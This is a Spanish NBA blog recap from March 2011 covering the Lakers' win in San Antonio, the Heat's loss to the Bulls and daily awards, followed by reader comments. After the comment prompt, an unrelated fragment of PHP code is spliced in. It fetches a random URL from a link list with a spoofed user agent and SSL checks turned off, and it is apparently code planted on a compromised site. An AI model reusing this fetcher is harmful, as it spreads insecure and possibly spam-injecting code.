La Crónica (06/03/2011)

07 de March de 2011 por TheDeerHunter

¡¡¡Los Lakers están que lo tiran!!!

No, no es que nos haya rebosado la fiebre amarilla de repente, pero no nos podíamos resistir a abrir el día con ese vídeo. Es cierto que los Lakers dieron un puñetazo en la mesa anoche, recobrando sensaciones de campeón en el mejor primer cuarto que se ha visto este curso. Nada menos que un 13-34 que condicionó todo el choque, con un tremendo desequilibrio en los emparejamientos Kobe vs Ginóbili, Gasol vs Duncan y Bynum vs Blair. Sólo Parker puntualmente y los reservas George Hill y Gary Neal escaparon de la quema. Por cierto, volvió Barnes y también se le vio francamente bien en el poco tiempo que estuvo en cancha. Además, Marc y sus Grizzlies le hicieron un inmenso favor a su hermano rompiendo la racha victoriosa de Dallas gracias a una canasta sobre la bocina de Randolph. La pareja Zach-Marc volvió a parecerse a la del año pasado. Inmensos.

lbj

Los Heat se la volvieron a dar en casa, ante los Bulls en otro partido apretado. Acumulan un terrorífico 1-5 en las últimas dos semanas con decepciones a cual más dolorosa. A medida que se acerca el final de la regular los grandes empiezan a ensayar defensas de playoffs y es ahí donde ellos están fracasando. Con todo la derrota de anoche tuvo bastante de casual, con una serie de tiros libres muy polémicos a favor de Deng. La forma de afrontar los últimos segundos con el manido LeBron contra el mundo tampoco resulta demasiado halagüeña. ¿Se necesitan tres super-estrellas para resolver de esa manera? El porcentaje de acierto de los Heat esta temporada en tiros para empatar o ganar en los últimos 10 segundos de partido es del, atención, 5.5% (1 de 18).

Del resto de implicados en las zonas altas de playoffs, los Celtics cumplieron sin demasiado brillo en Milwaukee. Los Thunder necesitaron de prórroga para doblegar a los Suns ante, oh noticia, una fantástica actuación de Vince Carter y con Durant flojo por culpa de la defensa de Grant Hill. Además, los Knicks ganaron en Atlanta.

También pudimos ver otro triple doble de Iguodala simultáneamente a una actuación sublime de Evan Turner en una brillante victoria de los Sixers ante los Warriors en la prórroga. Los Hornets lograron la victoria en Cleveland a pesar de que Chris Paul dio el susto y terminó en el hospital y los Pistons ganaron a los Wizards en un partido intranscendente.

rosePREMIOS

MVP: En una noche de muchas actuaciones meritorias, como el segundo triple doble consecutivo de Iguodala, los 27 puntos con buzzer beater de Zach Randolph, los 32 puntos y 11 asistencias de Westbrook o la exhibición colectiva de los Lakers en San Antonio, nos tenemos que quedar con Derrick Rose. Números al margen, su juego llevó a los Bulls a una nueva victoria sobre los Heat y posiblemente superó a LeBron en las quinielas sobre el MVP de la temporada.

Rookie: 24 puntos, 7 asistencias y 5 rebotes deberían de ser números más que suficientes como para alzar a John Wall con el premio del día. Pero los 20 puntos, 7 rebotes, 3 asistencias y 2 robos de Evan Turner, con mejores porcentajes y victoria de los Sixers, le acaban otorgando el galardón al #2 del pasado draft.

Sorpresa: ¿Acaso hay algo más sorprendente que ver a Mbah a Moute anotar 19 puntos ante la férrea defensa de los Celtics? Casualmente, ayer se cumplían dos años de la única vez en que el camerunés ha superado los 20 puntos en su carrera NBA.

Decepción: La incapacidad de los Heat para anotar en los últimos segundos de los partidos igualados es, más que decepcionante, algo recurrente. Lo que no estamos acostumbrados a ver es a unos Spurs tan sobrepasados por su rival como anoche durante la primera mitad. Los números de Duncan, Ginóbili y Jefferson lo dicen todo: 9 puntos sumaron entre los tres titulares.

Esfuerzo en vano: Equipos tan diferentes como los Heat, Wizards y Suns anoche coincidieron en una cosa. Tuvieron a tres jugadores en 20 o más puntos de anotación, pese a lo cual perdieron. James, Wade y Bosh para Miami; Carter, Gortat y Pietrus para Phoenix; y Wall, Young y Blatche para Washington.

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. Pop dice:
    #1

    En la primera mitad los Lakers parecían de otro mundo. Artest como un perro de presa, Kobe anotando y reboteando, Bynun cogiendo todos y cada uno de los balones que salían rebotados en ambas canastas…. Odom tampoco estuvo nada mal.

    Pau en la primera mitad parecía Nowitzki, anotando desde posiciones exteriores.

      Citar

  2. Denise dice:
    #2

    Si los Lakers tienen actitud y acierto en el tiro exterior, Lakers = Rodillo, como sucedió en la primera parte de ayer. Si los Lakers no tienen actitud, y están pesimos desde fuera, Lakers = Veguenza, como sucedió contra Bucks, Bobcats o Cavaliers.
    Desde el All-Star se le ve más enchufados, en especial Artest, el único que no ha demostrado nada es Blake, desde el priemr partido vs Rockets en el que metió el triple de la victoria, el hombre no ha hecho mucho.
    Para mi la sorpresa es que Carter meta 6 triples y 29 puntos, y que el coach de los Suns siga apostando por el bluff de Lopez como titular en vez de por Gortat.
    Creo que ya ha llegado la hora de que Kidd pase a ser el segundo base de los Mavs. Con Barea el equipo lo veo más peligroso.
    El problema de los Heat es que el resto no está aportando como si lo hacían los Perkins, House, Posey, Leon Powe en el Big Three de los Celtics cuando ganaron el título.
    No entiendo el cortar a Arroyo, para fichar al pufo de Bibby, y poner a Chalmers de titular.

      Citar

  3. Scriers dice:
    #3

    Visteis la que lió Artest después de hacer un tapón? juajua que loco.
    Ayer vi el final de los Bulls, con un Rose que tiene tanto talento como poco temple.tiene una habilidad inmensa para salir vivo de jardines. A mi es el típico base que me irrita. Pero es demasiado bueno!
    Luego los Lakers avasallaron. Daba gusto verlos jugar.

      Citar

  4. GreenPride dice:
    #4

    Y los Beach Boys se la volvieron a pegar… nuevamente. Tras la debacle en San Antonio, y la mala racha de resultados los Heat volvieron a casa para hacer lo de últimamente, primera parte buena y segunda en la que poco a poco se colapsan hasta dejar que el rival les coma la tostada, esta vez por poco y en nuevo final en el que LeBron y Wade no saben definir. Chicago les toma 2 derrotas de ventaja y el desempate y además tienen un calendario favorable, no como lo que les queda a los Heat así que se vislumbra una segunda ronda Bulls-Heat con ventaja campo de los Bulls que puede ser muy interesante. Los Bulls ya miran para arriba con un equipo muy físico que defiende a muerte y juega los finales bastante mejor que los Heat de la mano de Rose pero no haciendo uno contra el mundo como LeBron.
    Partidazo de los Lakers desarmando totalmente a los Spurs. Hay que reconocer que ha sido el mejor partido de la temporada de los amarillos y que han jugado al nivel que se supone a un equipo campeón. Gran defensa colectiva, todos enchufados y anotando con gran fluidez confirmando la mejoría que se viene viendo en el equipo tras el All Star. Este sí es el camino para los Lakers, pero no creo que les dé tiempo a recuperar la ventaja campo con Spurs (eso seguro) y probablemente tampoco con los Mavs aunque aquí habrá que estar atentos hasta el final. Para los Spurs la derrota en sí no es nada preocupante excepto por la forma en que se produjo. La sensación de inferioridad física en todas las posiciones excepto en la de base fue exagerada y deja dudas de si podrían competir aun con ventaja campo en una serie contra los Lakers. Mi opinión es que con los Lakers enchufados su superioridad física les daría clara ventaja en playoffs.
    Por su parte los Celtics siguen sumando victorias sin mucho brillo pero con mucho oficio mientras van acoplando a los nuevos. En la segunda parte su defensa volvió a ser la de antes de los trades y Krstic y Green parecen ya bastante acoplados, no como Murphy o Pavlovic a los que todavía les queda. Esta semana deberían volver Shaq y Delonte así que como los siguientes partidos no son muy complicados para los verdes pueden seguir juntando piezas mientras intentan asegurar el primer puesto del Este (cuidado con los Bulls)

      Citar

  5. KB # 24 dice:
    #5

    Totalmente de acuerdo con GreenPride, excepto con lo de que los Lakers no podrán superar el record de los Mavs.

    Creo que sí que lo harán

      Citar

  6. Txusma dice:
    #6

    Tras los traspasos seguís viendo a los Celtics peor que antes?

    Robinson + Perkins x Krstic+Murphy+Green+Pavlovic+Arroyo

      Citar

  7. Nacho dice:
    #7

    Tal y como están ahora las cosas en el Oeste. En el caso de los Lakers que preferís: ¿No tener ventaja de campo contra Mavs e ir de paseo a NO, o pegarte con los Blazers y tener la ventaja de campo?
    Yo sin duda prefiero a los Hornets. Creo que en el final de temporada en el Oeste será clave las posiciones de los que se pegan por abajo, y creo que al único que nadie quiere ver en primera ronda es a Portland. Igual son pegajosos los Nuggets, pero el resto contento estará de estar en PO. No me extrañaría que el maestro Zen haga esas cábalas. Porque para mí, sinceramente, la ventaja de campo no es crucial contra los Mavs, otra cosa son las espuelas y los verdes, aunque a los primeros hoy les han dado para el pelo.

      Citar

  8. TheDeerHunter dice:
    #8

    @Txusma: Yo es que no veo así la cuestión. Creo que lo que pueden hacer Krstic+Murphy+Green+Pavlovic+Arroyo lo pueden hacer otros mejor o peor en ese equipo. Digamos que los veo más redundantes, sin contar que tampoco los termino de ver integrados en la ideosincrasia defensiva de Rivers.
    Lo que daban Perkins, sobre todo, y Robinson creo que eran perfectos para su rol y en ese modelo. A mí me parecía así una plantilla casi inmejorable.

    También me puedo equivocar y que Perkins esté en realidad cojo como alguien dijo por ahí. No creo que le hubieran firmado ese contrato los Thunder en ese caso.

      Citar

  9. TheDeerHunter dice:
    #9

    @Nacho: No entiendo esa duda. Yo creo que sin ninguna duda los Blazers quedarán por delante de los Hornets al final del curso. Y mucho me temo que también lo hará alguno más. El corte de primera ronda en el Oeste va a estar tan feo como siempre.

      Citar

  10. Nacho dice:
    #10

    La duda no es si Portland estará por delante de Hornets, la duda es si los de arriba intentarán esquivar a los Blazers en primera ronda, aun perdiendo ventaja de campo en segunda.

      Citar

  11. TheDeerHunter dice:
    #11

    En ese caso puedo imaginarme a unos Lakers que no le den la importancia que se merece una segunda ronda o una final de conferencia con ventaja campo.
    Sin embargo, no puedo hacerlo mismo con ningún equipo más del Oeste. Por evitar a los Blazers en primera ronda cruzarte con unos Lakers o un San Antonio con desventaja campo… pésimo negocio.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>